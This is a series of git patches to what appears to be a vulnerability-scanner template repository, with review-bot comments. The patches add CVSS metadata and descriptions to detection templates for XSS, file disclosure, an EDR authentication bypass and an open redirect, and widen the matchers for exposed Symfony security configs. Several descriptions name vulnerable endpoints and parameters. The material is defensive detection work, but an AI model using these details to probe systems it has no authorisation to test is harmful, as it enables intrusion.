index 95cc66fabf..65b05e634d 100644
--- a/cves/2016/CVE-2016-1000143.yaml
+++ b/cves/2016/CVE-2016-1000143.yaml
@@ -9,6 +9,11 @@ info:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=780
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
tags: cve,cve2016,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000143
+ cwe-id: CWE-79
requests:
- method: GET
From 7e4cd54f9e25a8dd96e0249dd74e75d5dca656ad Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 14:13:53 +0300
Subject: [PATCH 35/39] Add description
---
vulnerabilities/other/qcubed-xss.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml
index 5309d50deb..420879092a 100644
--- a/vulnerabilities/other/qcubed-xss.yaml
+++ b/vulnerabilities/other/qcubed-xss.yaml
@@ -4,6 +4,7 @@ info:
name: Qcubed Reflected XSS
author: pikpikcu
severity: medium
+ description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter.
reference: https://github.com/qcubed/qcubed/issues/1230
tags: xss,qcubed
From ae55315ec6097964cc9262c23cf98e56570c5ddd Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 14:15:52 +0300
Subject: [PATCH 36/39] Improve description
---
vulnerabilities/other/qihang-media-lfi.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml
index a4bcd43d65..42e4aaed79 100644
--- a/vulnerabilities/other/qihang-media-lfi.yaml
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
@@ -4,7 +4,7 @@ info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
author: gy741
severity: high
- description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
+ description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
tags: qihang,lfi
From 07472bb02102b98d4be0ef226a98166592b21a80 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 14:21:38 +0300
Subject: [PATCH 37/39] Add description
---
vulnerabilities/other/sangfor-edr-auth-bypass.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml
index bd15d6ff70..2e4aa14045 100644
--- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml
+++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml
@@ -3,6 +3,7 @@ info:
name: Sangfor EDR Authentication Bypass
author: princechaddha
severity: high
+ description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username.
tags: sangfor,auth-bypass
requests:
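Review bot: The added `description:` is hard to parse: it says access is gained `using a provided username` and then ends with `without providing a username`, which reads as a contradiction. The author should confirm what the final clause was meant to say (possibly that no password is needed, but that is only a guess from the template name). Splitting the sentence in two would also help, since this text is what a reader of the scan report sees.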
From 0cb293abcaf17d0cfcb14a710122c1d7ae05f106 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Thu, 21 Oct 2021 14:25:28 +0300
Subject: [PATCH 38/39] Add description
---
vulnerabilities/wordpress/ultimatemember-open-redirect.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
index 84f1391b8e..55110ec907 100644
--- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
+++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
@@ -4,6 +4,7 @@ info:
name: Ultimate Member < 2.1.7 - Unauthenticated Open Redirect
author: 0x_Akoko
severity: medium
+ description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used.
reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f
tags: wp-plugin,redirect,wordpress
From 197c550fcec239ef985abbaa35271a4debcce0a1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 21 Oct 2021 19:19:21 +0530
Subject: [PATCH 39/39] Update symfony-security-config.yaml
---
exposures/configs/symfony-security-config.yaml | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml
index f11db61824..f1365ebe3d 100644
--- a/exposures/configs/symfony-security-config.yaml
+++ b/exposures/configs/symfony-security-config.yaml
@@ -4,23 +4,27 @@ info:
name: Symfony Security Configuration Exposure
author: dahse89
severity: info
- tags: config,exposure,symfony
reference:
- https://symfony2-document.readthedocs.io/en/latest/book/security.html
- https://symfony.com/doc/current/reference/configuration/security.html
+ tags: config,exposure,symfony
requests:
- method: GET
path:
- "{{BaseURL}}/config/packages/security.yaml"
- "{{BaseURL}}/app/config/security.yml"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "security:"
+ - "firewalls:"
+ - "access_control:"
condition: and
part: body
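Review bot: With `condition: and`, the word matcher now needs `security:`, `firewalls:` and `access_control:` all present in the body, so an exposed config that omits `access_control` will be missed; as far as I know Symfony treats that section as optional. Requiring `security:` and `firewalls:` alone would still rule out generic pages, so consider dropping `- "access_control:"` or moving it to a separate matcher. The matcher also leaves `condition` and `part: body` after `words`, whereas the other cleanups in this series move them before the word list.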